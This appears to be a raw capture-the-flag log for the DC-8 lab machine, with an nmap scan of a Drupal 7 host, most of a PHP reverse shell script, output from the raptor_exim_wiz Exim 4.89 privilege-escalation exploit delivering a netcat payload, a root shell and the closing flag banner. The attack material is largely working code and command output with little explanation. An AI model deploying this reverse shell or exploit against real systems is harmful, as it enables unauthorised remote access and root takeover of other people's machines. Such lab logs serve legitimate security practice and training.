Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:10 CST
Nmap scan report for 10.10.10.138
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
|   256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_  256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

// Note: the proc_open() call that assigns $process and $pipes is not
// included in this excerpt, nor are the $ip, $port, $chunk_size, $debug
// and $daemon definitions.
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
raptor_exim_wiz - "The Return of the WIZard" LPE exploit Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Thu, 18 May 2023 23:22:48 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1pzdai-0004rL-Bo
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# cd /root
root@dc-8:/root# ls
flag.txt
root@dc-8:/root# cat flag.txt
Brilliant - you have succeeded!!!
[DC-8 ASCII-art banner]

Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.